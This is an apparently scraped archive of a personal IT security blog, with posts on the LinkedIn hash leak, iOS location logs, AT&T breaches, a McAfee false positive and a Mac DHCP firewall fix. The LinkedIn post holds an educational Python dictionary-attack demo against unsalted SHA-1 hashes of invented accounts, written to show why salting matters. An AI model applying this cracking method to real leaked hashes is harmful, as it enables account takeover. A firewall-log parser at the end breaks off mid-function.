greg hughes - dot net - IT Security
http://www.greghughes.net/rant/
Note that the contents of this site represent my own thoughts and opinions, not those of anyone else - like my employer - or even my dog for that matter. Besides, the dog would post things that make sense. I don't.
Greg Hughes, greg@greghughes.net. Feed generated Thu, 07 Jun 2012 00:18:14 GMT by newtelligence dasBlog 2.1.8015.804.

A topic I always enjoy... I post this with the hope that you’ll be able to take something from it as a message to carry to others.

You may have heard that a list of roughly 6.5 million hashed LinkedIn passwords was reportedly stolen and posted online (see http://www.infoworld.com/t/hacking/65-million-linkedin-passwords-reportedly-stolen-posted-online-194976). You may have received emails from concerned people you know, intended to let you know about the issue. And while it’s a good idea to change your password now, I wanted to take the opportunity to expand on the topic a bit.

One message I consistently try to send is that it’s *always* a good idea to change your passwords regularly to protect against threats such as this and others.

This specific case (as the info is exposed today) doesn’t represent an immediate broad threat to LinkedIn accounts, beyond the ability to build a library of valid passwords without the usernames that go with them. But there is enough information exposed to suggest a need to take reasonable action. In this case, the leaked info is a list of hashed passwords. Hashing is not encryption: a hash is the output of a one-way function, there is no key, and the only way to get from a hash back to a password is to guess the password and check. The version of the list posted online contains only the hash values and not the associated user names or email addresses. However, the bad guys could possess that additional info and just not be releasing it. Yet. We don’t know.

“Hashed” means you cannot simply decrypt the list and read the actual passwords. Instead you have to build your own list of candidate passwords, hash each of them, and compare the resulting hashes against the stolen list to find matches. The posted LinkedIn hashes were unsalted SHA-1, which makes this cheap: one hash per guess can be checked against every entry in the list at once, and any two users who chose the same password show up as the same hash value. A match tells you that you hold a valid password for *someone’s* LinkedIn account, but not whose account it belongs to (since the login emails were not posted). But again, that account login/email info might be held by the bad guys who posted the hash list; there’s no way to tell for sure.

If the bad guys also have the account names/email addresses, the real risk is that they run a dictionary attack against the hashed password list, correlate the recovered passwords with the respective email addresses (LinkedIn uses your email address as the login name), and then use those credentials to log in to LinkedIn -- as well as to try the same email/password pairs on other sites and services where people might (and likely do) reuse them.
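The two paragraphs above describe the attack in words: hash every guess, look it up in the leaked list, and note that a hit gives you a password but no username. The script below is an added example written for this page (it is not code from the post or from LinkedIn) that runs that dictionary attack against a constructed hash list, then repeats it against the same passwords stored with a random per-entry salt to show why the unsalted form is so much cheaper to crack. It assumes unsalted SHA-1 for the posted list, which is the scheme the leaked LinkedIn hashes used; the accounts, passwords and wordlist are invented for the example.

```python
from __future__ import annotations

import hashlib
import os

# Constructed sample data for this example; none of it comes from the LinkedIn leak.
# Four imaginary accounts; two of them chose the same password.
USER_PASSWORDS = {
    "alice@example.com": "sunshine",
    "bob@example.com": "linkedin1",
    "carol@example.com": "sunshine",
    "dave@example.com": "correct horse battery staple 2012",
}

# The attacker's guess list. Real wordlists run to many millions of entries,
# and GPU rigs try billions of SHA-1 guesses per second.
WORDLIST = ["123456", "password", "sunshine", "linkedin1", "letmein", "qwerty"]


def sha1_hex(password: str, salt: bytes = b"") -> str:
    """SHA-1 of salt||password. With the default empty salt this is the unsalted
    scheme the example assumes for the posted list."""
    return hashlib.sha1(salt + password.encode("utf-8")).hexdigest()


def make_unsalted_leak() -> set[str]:
    """The leak as the post describes it: hash values only, no usernames attached."""
    return {sha1_hex(pw) for pw in USER_PASSWORDS.values()}


def crack_unsalted(leaked: set[str], wordlist: list[str]) -> tuple[dict[str, str], int]:
    """Dictionary attack on unsalted hashes. Each guess is hashed once and the set
    lookup checks it against every leaked hash at the same time. Returns the
    {hash: password} matches and the number of hash computations spent."""
    found: dict[str, str] = {}
    for guess in wordlist:
        h = sha1_hex(guess)
        if h in leaked:
            found[h] = guess
    return found, len(wordlist)


def make_salted_leak() -> list[tuple[bytes, str]]:
    """The same accounts stored with a random 16-byte salt per entry (still no
    usernames). Identical passwords no longer produce identical hashes."""
    leak = []
    for pw in USER_PASSWORDS.values():
        salt = os.urandom(16)
        leak.append((salt, sha1_hex(pw, salt)))
    return leak


def crack_salted(leaked: list[tuple[bytes, str]], wordlist: list[str]) -> tuple[dict[str, str], int]:
    """With per-entry salts the wordlist has to be re-hashed for every entry, so the
    work grows with the number of accounts instead of staying flat."""
    found: dict[str, str] = {}
    work = 0
    for salt, h in leaked:
        for guess in wordlist:
            work += 1
            if sha1_hex(guess, salt) == h:
                found[h] = guess
                break
    return found, work


if __name__ == "__main__":
    plain = make_unsalted_leak()
    found, work = crack_unsalted(plain, WORDLIST)
    print(f"unsalted: {len(plain)} distinct hashes for {len(USER_PASSWORDS)} accounts "
          f"(shared passwords are visible); cracked {len(found)} with {work} hash computations")
    salted = make_salted_leak()
    found_s, work_s = crack_salted(salted, WORDLIST)
    print(f"salted: {len(salted)} distinct hashes; cracked {len(found_s)} with {work_s} hash computations")
```

Run it and the unsalted pass recovers the two weak passwords with six hash computations in total, while the salted pass needs sixteen for the same four entries and scales linearly with the number of accounts. Salting alone does not rescue a weak password (the salted run still finds "sunshine" and "linkedin1"); what it removes is the one-hash-checks-everyone shortcut and the visibility of shared passwords. A site that also uses a deliberately slow construction (bcrypt, scrypt or PBKDF2 with a high iteration count, as in hashlib.pbkdf2_hmac) multiplies every one of those guesses by a large constant, which is the real defence for a leaked table. Nothing in the script tells the attacker whose account a cracked hash belongs to, which is exactly the gap the post says the posted list leaves open.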

So, yes. Change your passwords, not only on LinkedIn but also on other sites where the same user name and password are used, and give each site its own password so that one site’s breach cannot be replayed against another. But do it because it’s always been a good thing to do, not just when credential theft scares happen to come up. And also know that an actual readable list of LinkedIn passwords paired with login credentials has not been posted in the wild -- at least not yet.



greghughes.net weblog - copyright 2009 - licensed under a Creative Commons License (http://creativecommons.org/licenses/by-nc-sa/2.0/).

LinkedIn, passwords, hashing, and re-using credentials
http://www.greghughes.net/rant/PermaLink,guid,888eb255-6c64-47a0-b7a3-c14248b50abd.aspx
http://www.greghughes.net/rant/LinkedInPasswordsHashingAndReusingCredentials.aspx
Thu, 07 Jun 2012 00:18:14 GMT
Categories: IT Security, Safe Computing, Tech
Why is your iPhone/iPad tracking all of your location info?
http://www.greghughes.net/rant/PermaLink,guid,980dd58c-797a-4df1-8854-c48987b7ea13.aspx
http://www.greghughes.net/rant/WhyIsYourIPhoneiPadTrackingAllOfYourLocationInfo.aspx
Thu, 21 Apr 2011 01:25:29 GMT

Update: Apple has posted a Q&A page with information about the data in question (http://www.apple.com/pr/library/2011/04/27location_qa.html), exactly what that data is, and changes they have planned.

This is, well... it's at least very interesting. Which is to say, it’s something that has to make you wonder: Even when core location tracking is not active, apparently your iOS4 device is keeping a log of everywhere it goes (http://radar.oreilly.com/2011/04/apple-location-tracking.html). Which is to say, everywhere it goes with you.

The four images here are a visualization of the info harvested from my own iPad, retrieved automatically from an iTunes backup of my iPad on my Mac (click on each of the images to view full-size). I should note that the locations are actually displayed in a less accurate fashion (visually) by the program that generates the map plots, so as to somewhat avoid any issues and abuse associated with exact location tracking. The information in the data file being analyzed is substantially more accurate and detailed.

From cell tower triangulation (it appears this is where the data comes from), you can see a cross country trip I took with a friend from New York to New Mexico, visits to the Denver/Boulder area, and of course a whole slew of travel around the Pacific northwest, where I live.

[Four map screenshots: http://www.greghughes.net/rant/content/binary/screen-capture-map1.png through screen-capture-map4.png]

Also of interest is that I very recently (within the past two months) had my iPad replaced when the sync jack went bad, yet much of the data is from the old iPad in addition to the new one. Obviously when I restored a backup on the old one to the new one, the data was retained as part of the restore. Interesting. Also, there's location info that's recorded on mine, and in some cases I don't see the location data for areas I know I have been to. I'm not completely sure of the rhyme or reason for that.

Video of the two guys who discovered this and created the visualization program is here: http://www.youtube.com/watch?v=GynEFV4hsA0. They discuss how this was discovered and go into some detail about the data, where it lives and what they found. Video is via the Where 2.0 conference.

Got a 3G iPhone or iPad? You can run the "iPhone Tracker" app (http://petewarden.github.com/iPhoneTracker/) on your own Mac and see what your iTunes backup has sitting around on your computer. If your iTunes backups are encrypted (not a default setting) the data is still there but it's not readable.

On its face and in isolation this is not exactly a huge deal. The location data is not being sent anywhere as far as we know. It resides on your iPad or iPhone (3G models) and on your computer where you sync to iTunes. Well, that's assuming you don't sync to someone else's computer, of course. In that case, they might have your location data available to view and play with.

And really, that's why this could be a big deal, on some level. And it's not just that the data is being collected, cataloged, stored and exists, it's that it's been there since iOS4 was released, and we didn't know because no one really noticed until now. Someone had to get curious, poke around, dig into the data and discover it by accident. Makes you wonder what other info might be hanging around in places we don't know about, eh?

Hopefully Apple will explain exactly what all the data is, why it's there and how it's used - in great detail. It can't be there for no reason, and I can think of a few cool reasons for collecting the data, but unencrypted and no notification of tracking is a little concerning to me. I'm looking forward to hearing from Apple to understand more.

Categories: Apple, IT Security, Mobile

And to Apple: I’m sorry, but as good as you make me feel about the world of technology, I just don’t love you enough to endure AT&T’s bad habits (http://gizmodo.com/5564262/) anymore. So, the iPhone has to go, too. And that makes me sad. I truly wish things were different. I almost can’t believe I’m doing this. They say if you love something, let it go free. It’s a brutal suggestion, really.

Let me start out by saying, for those who don’t know, that I’m a security and IT management professional by trade. I’ve held executive and senior management roles for both security and IT functions at a publicly-held company in the financial services space, I’ve consulted with governments and companies large and small on cyber-security issues, and these days I manage security strategy for a Fortune-500 company. So, I have some perspective and reality-based opinions about security and quality.

Let me also say - plainly and clearly - that this blog is where I voice my own opinion about things that are on my mind (as opposed to discussing work-related topics). And my mind is pretty active right now as it concentrates on my personal AT&T Wireless account and the lack of service and security quality the company has delivered over time. In other words, I have some strong opinions on the topic.

This is certainly a bit of a rant, but it’s not a knee-jerk reaction. It’s grounded in reality and reason and I have put some time and thought into my decision.

And enough is enough: I’m done with AT&T.

First AT&T’s reliability and call-handling problems were the issue, and frankly those were bad enough on their own. There are locations where I can *guarantee* calls will drop on my iPhone on the 3G network, every single time. Areas with three to five (out of five) bars of signal strength where the call suddenly drops and the signal goes to zero, before churning around trying to reconnect and eventually coming back with a full signal once (I assume) a tower hand-off finishes. I actually have to tell people that the call will drop in a few seconds and that I will call them back in a couple minutes when the service recovers. They always want to know how I can know that. It’s sad. Coverage has gotten *worse* over the past several months in many areas where I travel, and call reliability has suffered. It’s probably worth noting that the same bad service areas affect my iPad’s 3G data access, as well. So, it’s not just my iPhone.

As if that wasn’t enough, there’s the cost associated with the AT&T service. We pay a premium for iPhone voice and data plans, and get crap for service in return. If I had a buck for every time someone tried to call me and got voice mail, while my phone was sitting in front of me with four or five bars yet never rang once, I’d be able to pay that early termination penalty AT&T requires of its customers. It’s bad enough that AT&T sells us this poor service, but it’s even worse that Apple isn’t more publicly vocal and more forceful about getting the problems solved. It’s been three freakin’ years already, for gosh sakes! There is absolutely no excuse.

Then a week ago comes news that AT&T’s iPad registration service was exposing email addresses (http://gawker.com/5559346/apples-worst-security-breach-114000-ipad-owners-exposed) and validating iPad hardware identifiers, as uncovered by a hacker group with an unfortunate name (don’t Google it if you are not already familiar with why it’s unfortunate, just trust me on that one). I, too, got the victim-list email from AT&T describing what had happened, six or seven days after the fact. It’s not the actual leak that stinks in this case, it’s the fact that such a design -- one that hands back a customer’s email address to whoever presents a valid hardware identifier, with nothing else to prove they own the device -- would make it into an Internet service in the first place.

Since then, there’s been a bit of a meta-debate about who’s responsible for what, and all of it is really just details. The fact that the information leak *could* happen in the first place is yet another indicator of why AT&T is a sloppy, careless company when it comes to the services I consume and my personal information. Shame on them. But there’s more…

Then this week comes the straw that broke my proverbial camel’s back (http://gizmodo.com/5564913/), as AT&T’s servers fail massively under load (http://gizmodo.com/5563909/) during the iPhone 4 pre-order, and we discover that apparently the company's critical software changes didn’t get tested, and changes got made at the last minute. Oh, and as a result our personal data is being exposed (http://gizmodo.com/5564262/) – once again - due to a supposed flaw in the AT&T systems and how they access database records.

Holy cow.

Regardless of the variety of outstanding questions about the exact details and severity of the security situations (http://arstechnica.com/security/news/2010/06/atts-ipad-security-breach-could-be-worse-than-initially-thought.ars), the very existence of these problems is more than just problematic.

One has to wonder, if one is being pragmatic and watching the past couple weeks’ activity: What else might they be skimping on that we don’t already know about? If I followed the same practices and didn’t test or validate security and functionality in my line of work, there’s no doubt I’d be gone in a second. Again, simply unacceptable for a huge company and its customers, who demand and require trust.

None of this is indicative of a company that practices good, basic security principles as a matter of course. It’s not indicative of a company that strives first for quality. And it’s not the type of company I feel like I can trust anymore.

So, I am quitting you, AT&T. I’d say it’s been nice knowing you, but that would be mostly a lie. So I’ll just walk away and let the past be the past, and focus on the future. Nine-plus years is enough. Good luck to you. I hope you will change, but it’s going to take some serious work, and I just don’t know if you can actually do it. Your track record is not good. Change is hard. Change means pain. And in the end, most people aren’t willing to endure that process. But maybe you will, and if you do please let me know. I’d like nothing more than to be a happy customer and to write something happy and positive here. I’ll keep my iPad service going with you, since I don’t really have much of a choice and its very existence is part of what makes it possible for me to let the iPhone go (http://www.greghughes.net/rant/ToIPhoneOrNotToIPhoneThatsTheQuestion.aspx). But it’s time for a new phone on a new carrier.

Maybe someday you’ll earn my business back. You might have Apple in your jaws of exclusivity, but not me. For now, you’ve lost my trust and business -- and please realize that you killed an Apple iPhone customer in the process.

And that’s really saying something.

P.S. – A quick final thought to Apple:

I love the hardware. I love the OS. I love the apps. But I can’t stand the service provider, which has failed us for too long now.

I fail to see how you can continue to do exclusive business with a company like AT&T (http://money.cnn.com/2010/06/16/technology/att_apple/), and I hope you’ll quickly open up options for your customers. Maybe you’re already working on it, which would be a breath of fresh air in this cramped, stuffy, smelly room. I’m sure many will suffer the pains of AT&T to get your hardware and software in their hands, and honestly this is a painful decision for me to make because your phone is something I want and need. But your corporate quality and image is directly tied – even intertwined - to AT&T in the United States, and for a company that stands tall on the ideals of doing things well rather than doing them first, your AT&T relationship is a failure of massive proportions, with quality never measuring up and the ability to correct way too lacking. For what it’s worth. I want your products more than any other, but AT&T’s issues have finally crossed a line and have reached the summit of Mt. Unacceptable.

So, what do I do? Please, tell me. Do I wait patiently for a relatively short period of time for another carrier option, or do I just make the move now and use someone else’s hardware?

I am truly sorry to have to leave, Steve. Please, win me back.



Dear AT&T: You’re fired
http://www.greghughes.net/rant/PermaLink,guid,2db3adc5-16a4-451d-b426-712331381291.aspx
http://www.greghughes.net/rant/DearATampTYoursquoreFired.aspx
Thu, 17 Jun 2010 05:49:31 GMT
Categories: Apple, IT Security, Mobile, Tech, Things that Suck
http://www.greghughes.net/rant/PermaLink,guid,b62dce32-b58d-4c3b-886d-073c53406327.aspx

Many users of McAfee's virus scanning products are experiencing some real pain today due to a false positive virus alert (for the wecorl.a virus) that is resulting in dcom error reboots and in many cases the removal of the valid Windows svchost.exe from affected systems.

Despite a massive slew of articles and posts made on web sites today saying a new virus is in the wild and infecting computers (typically referring to this is a zero-day vulnerability), this is not in fact a virus outbreak, as anyone who knows how to use Google and has a remotely curious mind can discover in a matter of seconds. It’s an antivirus false-positive. The wecorl.a trojan is a couple years old, and this is not it. Even if it was a virus, it would not be zero-day.

In a nutshell, McAfee made a big mess with their AV update early this morning, and they are working feverishly to fix it. Read on.

First of all, if you're affected by the problem described below, information about a workaround fix and an update is available from McAfee at the McAfee Threat Center web site:

One of my own computers fell victim to this today, and I've been fighting with it since. I just got it back online, restored to normal and fully operational. My problem started at about 7am today and so I was figuring it out on my own, but the instructions McAfee has provided for the workaround/fix (linked above) are basically the same thing.

wecorl A DAT (virus definition 5958) file that appears was released earlier today has an issue that causes the valid Microsoft svchost.exe critical system file to be flagged as infected. It's not infected, though. This appears to impact primarily Windows XP SP3 computers, but it could be broader than that. As a result of the false flagging of the file, the McAfee AV software takes action, which can include doing nothing, quarantining the file, or in some cases removing it completely (that's what happened to mine).

If the file is quarantined or deleted, Windows stops working normally and a lot of the typical Windows functionality just isn't there anymore. Things like start menus, drag and drop capabilities, copy and paste in Explorer, and a whole lot more. You can still open Task Manager and launch new tasks manually, and the CMD window interface (command line shell) works just like always, so it's possible to get around to fix it up.

If you are running McAfee Virus Scan and have a signature file version 5958 (open the "about" dialog and look for the DAT version), then it appears you are affected. Rolling back to 5957.0000 (which was issued 4/20) will resolve the issue. There is also an "extra.dat" file available that can be dropped into the McAfee AV scanner's DAT directory while in safe mode, and then the computer should be restarted. Or if you're a business using EPO to centrally manage your AV system, you can push it out with that.

But if your svchost.exe file has been quarantined or deleted, you'll have to do some hands-on repair (at east for now, until a better solution is put together). The link at the top of this article walks you through what's needed.

This is a serious challenge today for McAfee. Their web sites appear to be badly overloaded and I have friends in the business who are waiting on hold with McAfee for extended periods on time. In speaking with people working at other (huge) companies, it's apparent the impact is huge and widespread. Thousands of people who should be working are dead in the water now, so to speak, with no computer to do their work on.

I hate to think what the financial impact of this is. It's got to be huge. Follow the link above and check it for updates from McAfee as time goes on.



greghughes.net weblog - copyright 2009 - licensed under a Creative Commons License. The wecorl.a virus alert for McAfee users today is a false-positive - Bad DAT update file is the cause http://www.greghughes.net/rant/PermaLink,guid,b62dce32-b58d-4c3b-886d-073c53406327.aspx http://www.greghughes.net/rant/TheWecorlaVirusAlertForMcAfeeUsersTodayIsAFalsepositiveBadDATUpdateFileIsTheCause.aspx Wed, 21 Apr 2010 20:07:18 GMT <p> Many users of McAfee's virus scanning products are experiencing some real pain today due to a false positive virus alert (for the wecorl.a virus) that is resulting in dcom error reboots and in many cases the removal of the valid Windows svchost.exe from affected systems. </p> <p> Despite a massive slew of articles and posts made on web sites today saying a new virus is in the wild and infecting computers (typically referring to this is a zero-day vulnerability), <em>this is not in fact a virus outbreak</em>, as anyone who knows how to use Google and has a remotely curious mind can discover in a matter of seconds. It’s an antivirus false-positive. The wecorl.a trojan is a couple years old, and this is not it. Even if it was a virus, it would not be zero-day. </p> <p> In a nutshell, McAfee made a big mess with their AV update early this morning, and they are working feverishly to fix it. Read on.<em> <br> </p> > <p> <em>First of all, if you're affected by the problem described below, information about a workaround fix and an update is available from McAfee at the McAfee Threat Center web site:<br> </em> </p> <ul> <li> <a href="http://vil.nai.com/vil/5958_false.htm" target="_blank">False positive detection of w32/wecorl.a in 5958 DAT - http://vil.nai.com/vil/5958_false.htm</a> </li> </ul> <p> One of my own computers fell victim to this today, and I've been fighting with it since. I just got it back online, restored to normal and fully operational. 
My problem started at about 7am today and so I was figuring it out on my own, but the instructions McAfee has provided for the workaround/fix (linked above) are basically the same thing. </p> <p> <img style="border-right-width: 0px; margin: 0px 0px 10px 15px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="wecorl" border="0" alt="wecorl" align="right" src="http://www.greghughes.net/rant/content/binary/WindowsLiveWriter/The.avirusalertforMcAfeeuserstodayisafal_BF78/wecorl_3.png" width="487" height="53"> A DAT (virus definition 5958) file that appears was released earlier today has an issue that causes the valid Microsoft svchost.exe critical system file to be flagged as infected. It's not infected, though. This appears to impact primarily Windows XP SP3 computers, but it could be broader than that. As a result of the false flagging of the file, the McAfee AV software takes action, which can include doing nothing, quarantining the file, or in some cases removing it completely (that's what happened to mine). </p> <p> If the file is quarantined or deleted, Windows stops working normally and a lot of the typical Windows functionality just isn't there anymore. Things like start menus, drag and drop capabilities, copy and paste in Explorer, and a whole lot more. You can still open Task Manager and launch new tasks manually, and the CMD window interface (command line shell) works just like always, so it's possible to get around to fix it up. </p> <p> If you are running McAfee Virus Scan and have a signature file version 5958 (open the "about" dialog and look for the DAT version), then it appears you are affected. Rolling back to 5957.0000 (which was issued 4/20) will resolve the issue. There is also an "extra.dat" file available that can be dropped into the McAfee AV scanner's DAT directory while in safe mode, and then the computer should be restarted. 
Or if you're a business using EPO to centrally manage your AV system, you can push it out with that. </p> <p> But if your svchost.exe file has been quarantined or deleted, you'll have to do some hands-on repair (at east for now, until a better solution is put together). The link at the top of this article walks you through what's needed. </p> <p> This is a serious challenge today for McAfee. Their web sites appear to be badly overloaded and I have friends in the business who are waiting on hold with McAfee for extended periods on time. In speaking with people working at other (huge) companies, it's apparent the impact is huge and widespread. Thousands of people who should be working are dead in the water now, so to speak, with no computer to do their work on. </p> <p> I hate to think what the financial impact of this is. It's got to be huge. Follow the link above and check it for updates from McAfee as time goes on. </p> <br /> <hr /> <font size="1">greghughes.net weblog - copyright 2009 - licensed under a <a href="http://creativecommons.org/licenses/by-nc-sa/2.0/">Creative Commons License</a>.</font> http://www.greghughes.net/rant/CommentView,guid,b62dce32-b58d-4c3b-886d-073c53406327.aspx IT Security Tech

Cloud Security summit offered free on September 30th
Sat, 26 Sep 2009 00:36:42 GMT
http://www.greghughes.net/rant/CloudSecuritySummitOfferedFreeOnSeptember30th.aspx

One of the upcoming online summits at BrightTalk is the Cloud Security Summit, which consists of a bunch of web conferences on September 30th.

You can visit the summit overview and schedule page here: http://www.brighttalk.com/summit/cloudsecurity

Lots of topics around security, legal issues and compliance in the context of cloud computing. Good stuff. Recently on RunAs Radio we have had a couple of discussions where cloud computing came up, too.

  • RunAs Radio #126: Steve Riley is Up in the Clouds - http://runasradio.com/default.aspx?showNum=126
  • RunAs Radio #123: Andy Malone Battles Security in the Clouds - http://runasradio.com/default.aspx?showNum=123

Beta test opportunity: Help us test a cool security application for notebooks
Tue, 24 Mar 2009 01:26:09 GMT
http://www.greghughes.net/rant/BetaTestOpportunityHelpUsTestACoolSecurityApplicationForNotebooks.aspx

UPDATE: We've had a great response and have assigned all of our beta invitations for the first round of testing, but please check the details below and let me know if you think you'd be able to help in a future phase!

I'm working with a software company to test some cool software that's currently in the early beta stage of development. The software is of a security nature and will be of interest to IT and security folks as well as individual computer users. We're looking for people with netbooks and notebook computers, especially ones with webcams built in, to test the software and provide feedback.

You'll be provided a test key and the beta software, and will need to honor the confidentiality provisions of the test program. It's nothing too complicated and the test risks are very small. You'll install the software, run through a few operational tests and let us know the results. We will ask first for technical results ("Did this work?") as well as your opinions and thoughts, should you wish to provide them.

What you'll need to provide and have available for the test:

  • One or more notebook or netbook computers
  • Computer(s) must be running Windows XP, Vista or Windows 7
  • If it has a webcam built in, all the better (but not required)
  • A Flickr account (basic account is fine)
  • An email account and server information (for application configuration to allow sending of email alerts)

What you'll get as a result of testing and providing feedback:

  • A free copy of the release version of the software when it's released (and you'll be glad you have it installed if your computer is ever lost or stolen, hint hint)
  • Satisfaction and a sincere thank-you from me and the developers of the software

This software is quite interesting and has a lot of promise to provide real security value when it hits the streets, so we want to find as many complete test cases as we can. If you're interested, please email me at greg@greghughes.net and provide the details about your system, OS, etc. - or call me at 503-766-2258. We are testing now, so let me know!

And thanks!

Can you get a web page removed from Google search results?
Wed, 04 Mar 2009 15:12:27 GMT
http://www.greghughes.net/rant/CanYouGetAWebPageRemovedFromGoogleSearchResults.aspx

More than once someone has asked me if there is a way to get Google to change their search results to exclude mean, inaccurate, defamatory, rude, or otherwise hard-to-swallow web pages. Often the desire motivating the question is legitimate, as someone has been smeared unfairly or - even worse - in a completely fabricated and malicious fashion, sometimes by anonymous online personalities.

The short answer is, "Probably not."

Now, before you think the proper solution is to have Google block the pages from their search results, it's important to understand that Google is not the Internet, and that it's not really making recommendations to you when it lists web pages that match what you're looking for. Rather, it's showing you an extensive list of links to content out there on the Internet that seems to match what you're looking for.

And that's what Google's search engine is: a way to find information created by other people and displayed on the Internet. It's not a filter that's meant to decide good from bad, who's right and who's wrong, who's lying or telling the truth, etc.

That said, there are things that Google works hard to avoid showing you. Spammy pages (especially ones that try to game Google's own advertising systems) are filtered out, and there are a couple of topics that won't return results in their AdSense and AdWords advertising systems (just try to set up AdSense on a site that sells or promotes firearms, for example). So they're not completely hands off, but for the most part they don't discriminate.

When you want to have a web page removed from the search listings at Google, the most effective (and almost the only) way to do so is to convince the person controlling the web page to change the information or remove it. If you can't get them to do that, it might be time to go to a court - assuming you have convincing proof that the page is inaccurate and/or malicious, etc.

Granted, if a judge sends Google a legal notice requiring them to take action, they'll probably do so. But good luck getting a judge to agree to do that.

Always go after the source of the problem. It's not Google's fault that some mean person posted a page that says you're a jerk and a thief (even though you're not). But you might be able to convince a judge that the person you claim is defaming you should change or remove the page. If that happens, Google's indexing bots will automatically update the search results the next time they crawl the offending pages and see the content has changed.

Matt Cutts has a good article (with a great graphic) discussing this: http://www.mattcutts.com/blog/remove-page-from-google/. Here's a brief excerpt of what Matt tells people when they ask him the same question:

We really don't want to be taking sides in a he-said/she-said dispute, so that's why we typically say "Get the page fixed, changed, or removed on the web and then Google will update our index with those changes the next time that we crawl that page."

His post prompted me to think about this again since I get this type of question several times a year. Just keep in mind that while it's an emotionally difficult thing to have someone write mean things and lies about you for all to see, it's a relatively clinical process to try to get that information changed or removed. Just make sure you stay calm and look to the right people to help with driving those changes.

Google's official page that addresses how to remove content from the company's search results is located at:

http://www.google.com/support/webmasters/bin/answer.py?answer=136868

Mac DHCP wireless connection broken with self-assigned IP address (with solution)
Mon, 09 Feb 2009 08:04:44 GMT
http://www.greghughes.net/rant/MacDHCPWirelessConnectionBrokenWithSelfassignedIPAddressWithSolution.aspx

I dropped into a Starbucks this afternoon, all prepared to get some emails written and to get some work done between my Sunday afternoon and evening commitments. Everything was fresh in my mind and ready to go via the keyboard and onto the screen. I fetched my grande two-pump sugar-free vanilla skinny latte and sat down in the chair, opened the laptop and watched it wake up and connect to the AT&T wireless access point.

But much to my dismay nothing would load over the network. The AirPort icon in the status bar showed the name of the network and indicated that I was connected to the access point, but I had no connection to the Internet.

After a brief bit of trying over and over to load a web page, I checked the network preferences in the Apple System Preferences panel and found that I was not getting an IP address. The Mac was self-assigning a 169.* address, which is a non-routable, local-only address. I tried restarting the AirPort card in the Mac, but that didn't help. I then found I was able to connect normally with my iPhone to the AT&T WiFi network and get a "real" IP address (192.x), so I quickly deduced that something was wrong with my Mac.

I had to give up on troubleshooting and head back out into the world, but I spent the rest of the day wondering if maybe there was something about the MAC address for my wireless card that AT&T had chosen to hate. After finishing my day of activities, I drove home this evening and fired my laptop back up. It connected to my home wireless network. But again, no IP address assigned. Hmm, definitely the laptop.

I started thinking now. What could be happening? Powering the AirPort on and off, shutting down the Mac and powering it back up, manually telling the network stack to renew its DHCP lease - all these things did no good.

I finally decided to take a look at the Mac firewall logs. You'd think that would be the first place I'd look, being a security guy. They're kind of hidden in plain sight, a few layers deep in the Mac's preferences dialogs. You go to the System Preferences panel, then the Security section, then the Firewall tab, then click the Advanced button, and finally click the Open Log button. If logging isn't already turned on, you can enable it there, as well.

Sure enough, I looked in the log and found several examples of this (the "Deny configd data in" part is the important bit):

    Feb 8 23:02:04 greg-hughess-macbook-air Firewall[39]: Deny configd data in from 192.168.0.1:67 uid = 0 proto=17
    Feb 8 23:02:26: --- last message repeated 2 times ---

Ah hah... Apparently the firewall was refusing the inbound data from the router (UDP, proto 17, from port 67, the DHCP server port) as it tried to hand out the DHCP address being requested by the laptop. The configd daemon (http://developer.apple.com/documentation/Darwin/Reference/Manpages/man8/configd.8.html) is a service that handles configuration changes for various pieces of the system, mostly network-related. Great, I had something to fix!

I first confirmed configd was in fact running, then deleted the firewall configuration file (located at /Library/Preferences/com.apple.alf.plist) and configured the firewall to temporarily allow all connections, and then back to allowing essential services. Sure enough, as soon as I made the changes the Mac was able to get a DHCP address from the router, and the network was back up and working.

I have no real idea how the firewall got messed up. At one point I had it set to configure access for specific services and apps, so that might have had something to do with it. But it's strange that this problem only started today. It's possible the configd process was denied by a rule, I suppose. Perhaps I hit a key on a pop-up dialog to deny firewall access to the daemon without even realizing it while typing?

At any rate, it seems to be working now (as evidenced by the fact that I am able to post this blog entry, of course) and hopefully it will continue to work as expected. Maybe this will help someone else troubleshoot a similar issue.
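
The firewall log line quoted in the Mac DHCP post above is enough to automate the check the post describes doing by eye: a Deny entry for configd, UDP (proto=17) arriving from a router's port 67, is the application firewall dropping DHCP server replies, which is exactly why the Mac falls back to a self-assigned address. The script below is an added example written for this page, not code from the original post or from Apple. It parses lines in the log shape shown above, folds the "last message repeated N times" continuation lines into the preceding event's count, and totals blocked DHCP replies per server address. The sample log is constructed for the example: the first line is the one from the post, while the mDNSResponder line and the repeat counts are made up, and the assumption that Allow entries and other processes share the same line shape is mine.

```python
import re
from dataclasses import dataclass
from typing import Dict, List, Optional

UDP = 17               # proto=17 in the log is UDP
DHCP_SERVER_PORT = 67  # DHCP servers answer from UDP/67 to the client's UDP/68

# Line shape taken from the entry quoted in the post:
#   Feb 8 23:02:04 host Firewall[39]: Deny configd data in from 192.168.0.1:67 uid = 0 proto=17
# Assumption (mine): Allow entries and other processes use the same shape.
EVENT_RE = re.compile(
    r"^(?P<ts>[A-Z][a-z]{2}\s+\d{1,2}\s+\d{2}:\d{2}:\d{2})\s+"
    r"(?P<host>\S+)\s+Firewall\[\d+\]:\s+"
    r"(?P<action>Allow|Deny)\s+(?P<process>\S+)\s+data in\s+from\s+"
    r"(?P<src_ip>\d{1,3}(?:\.\d{1,3}){3}):(?P<src_port>\d+)"
    r"(?:\s+uid\s*=\s*(?P<uid>\d+))?"
    r"(?:\s+proto=(?P<proto>\d+))?\s*$"
)

# syslog-style continuation line, also quoted in the post:
#   Feb 8 23:02:26: --- last message repeated 2 times ---
REPEAT_RE = re.compile(
    r"^[A-Z][a-z]{2}\s+\d{1,2}\s+\d{2}:\d{2}:\d{2}:\s+"
    r"--- last message repeated (?P<n>\d+) times ---\s*$"
)

# Constructed sample log: line 1 is from the post, the rest is made up.
SAMPLE_LOG = """\
Feb 8 23:02:04 greg-hughess-macbook-air Firewall[39]: Deny configd data in from 192.168.0.1:67 uid = 0 proto=17
Feb 8 23:02:26: --- last message repeated 2 times ---
Feb 8 23:03:10 greg-hughess-macbook-air Firewall[39]: Allow mDNSResponder data in from 192.168.0.1:5353 uid = 0 proto=17
Feb 8 23:03:15 greg-hughess-macbook-air Firewall[39]: Deny configd data in from 192.168.0.1:67 uid = 0 proto=17
"""


@dataclass
class FirewallEvent:
    timestamp: str
    host: str
    action: str
    process: str
    src_ip: str
    src_port: int
    proto: Optional[int]
    count: int = 1  # grows when a "last message repeated N times" line follows


def parse_line(line: str) -> Optional[FirewallEvent]:
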